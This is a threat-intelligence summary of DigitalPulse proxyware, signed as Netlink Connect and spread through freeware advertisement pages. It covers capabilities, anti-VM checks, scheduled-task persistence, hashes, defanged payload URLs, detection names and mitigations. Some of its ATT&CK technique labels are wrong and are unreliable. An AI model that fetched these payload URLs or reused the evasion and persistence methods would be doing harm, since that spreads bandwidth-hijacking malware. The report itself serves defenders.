Full Report
AhnLab SEcurity intelligence Center (ASEC) has recently confirmed that proxyware is being installed through advertisement pages of freeware software sites. The proxyware that is ultimately installed is signed with a Netlink Connect certificate, but according to the AhnLab analysis, it is identical to the DigitalPulse proxyware that was abused in past Proxyjacking attack campaigns. While […]
Analysis Summary
# Tool/Technique: DigitalPulse Proxyware (Signed as Netlink Connect)
## Overview
DigitalPulse is a strain of proxyware secretly installed on victim systems via advertisement pages associated with freeware software downloads. Its purpose is to hijack the victim's internet bandwidth for financial gain, similar to other proxyware strains like IPRoyal, Peer2Profit, Traffmonetizer, Proxyrack, and PacketStream. This specific variant is notable for being signed with a "Netlink Connect" certificate, though functionally it is identical to previously observed DigitalPulse instances.
## Technical Details
- Type: Malware family (Proxyware)
- Platform: Windows
- Capabilities: Bandwidth resource hijacking, anti-analysis/anti-VM routines, persistence via Task Scheduler.
- First Seen: Context implies recent resurgence (2024), but the DigitalPulse strain itself was active in 2023.
## MITRE ATT&CK Mapping
This summary focuses on the observed delivery and execution mechanisms, and the core function of the resulting proxyware.
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Related to past LummaC2 distribution)
- T1566.004 - Phishing: Malicious File
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1497 - Virtualization/Sandbox Evasion
- **TA0003 - Persistence**
- T1547 - Boot or Logon Autostart Execution
- T1547.011 - Scheduled Task/Job
## Functionality
### Core Capabilities
- **Resource Hijacking:** Involuntarily shares the infected system's internet bandwidth with external sources for monetary profit (Proxyjacking).
- **Disguise:** The initial loader malware masquerades as a legitimate utility named "AutoClicker.exe" (a GUI auto-click feature program).
- **Persistence:** Installs the final proxyware payload (NTService.exe) in a hidden location (`C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Performance\`) and creates a persistence mechanism via the Windows Task Scheduler named "Network Performance".
### Advanced Features
- **String Encryption:** The "AutoClicker" downloader encrypts its strings and disguises function names to complicate static analysis.
- **Anti-Analysis:** Implements extensive checks to detect analysis environments (VMs and Sandboxes) by checking loaded DLLs (e.g., Sandboxie, Comodo, Cuckoo), firmware details (Hyper-V, VMware), specific kernel files (KVM, VirtualBox), running services, open ports, named pipes, and process names (e.g., Procmon64).
- **Chained Infection:** Utilizes compromised or malvertising-driven websites to redirect users, potentially spreading secondary threats like LummaC2 via clipboard commands.
## Indicators of Compromise
- File Hashes: MD5 `0321c9bc08e5f14cab6dfa53e458247e`, `08a5b638c95b7bf98182e35c9535cbf5`, `2a6aa8a4b14623939861922fb737a0a4`, `2b47d8945d1bf31ce9c9cd3a8ee4f5f2`, `2dda6b6e4d4937570a362c0504f46639`
- File Names: `AutoClicker.exe` (Initial loader/downloader), `NTService.exe` (Final proxyware payload)
- Registry Keys: Not explicitly detailed, but Task Scheduler registration is used.
- Network Indicators:
- URLs distributing stages: `https[:]//a[.]pairnewtags[.]com/pid/s[.]js`, `https[:]//c[.]pairnewtags[.]com/c[.]txt`, `https[:]//filerit[.]com/k[.]js`, `https[:]//filerit[.]com/pi-240924[.]ps1`, `https[:]//raw[.]githubusercontent[.]com/Evastrea/5Ag3R4ObWH/main/GKPXAP[.]exe`
- Behavioral Indicators:
- Execution of PowerShell commands downloaded via obfuscated JavaScript loading.
- Registration of a task named "Network Performance" for persistence.
- Numerous attempts to check for virtualization hooks and analysis tools.
## Associated Threat Actors
- Threat actors involved in past **Proxyjacking** campaigns using **DigitalPulse**.
- General threat groups leveraging malvertising/ad-page redirection schemes to distribute PUPs/malware.
## Detection Methods
- Signature-based detection: AhnLab detection names include `Trojan/Win.Proxyware.R645077`, `Trojan/Win.FSAutcik.R684719`, `Dropper/Win.Proxyware.C5701827`, etc.
- Behavioral detection: Detection of PowerShell execution downloading resources from suspicious URLs, especially when masked or disguised (`Execution/MDP.Powershell.M2514`).
- YARA rules: Not explicitly provided, but signatures targeting known strings or anti-analysis routines of DigitalPulse would be effective.
## Mitigation Strategies
- **User Awareness:** Exercise extreme caution when downloading freeware from non-official sites or responding to unexpected advertisements or pop-ups. Do not execute downloaded executables unless source verification is absolute.
- **Execution Control:** Implement controls (like AppLocker or constrained language modes) to restrict suspicious PowerShell execution, especially that which involves downloading and executing files from the internet.
- **System Hardening:** Regularly audit the Task Scheduler for newly created or unusual tasks, particularly those running under system context or related to "Network Performance."
- **Security Software:** Utilize endpoint detection and response tools capable of identifying the multi-stage infection process and the known characteristics of proxyware families.
## Related Tools/Techniques
- **Proxyware Strains:** IPRoyal, Peer2Profit, Traffmonetizer, Proxyrack, PacketStream.
- **Previously Linked Malware:** DigitalPulse (core proxyware strain), LummaC2 (distributed via clipboard command technique).
- **Technique Relation:** Related to cryptojacking in its use of unauthorized system resources for profit.